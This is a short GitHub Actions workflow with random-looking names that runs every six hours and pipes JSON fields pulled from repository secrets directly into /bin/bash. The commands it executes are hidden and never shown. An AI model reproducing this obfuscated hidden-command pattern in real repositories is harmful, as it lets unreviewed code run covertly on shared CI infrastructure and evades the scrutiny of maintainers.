name: suoruchao4376

on:
  workflow_dispatch:
  schedule:
    - cron: '37 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: suoruchao4376
        env:
          citi579: ${{ secrets.citi579 }}
        run: |
          echo $citi579 | jq -r .cq7849 | /bin/bash
          echo $cj30700 | jq -r .nyyu11364 | /bin/bash

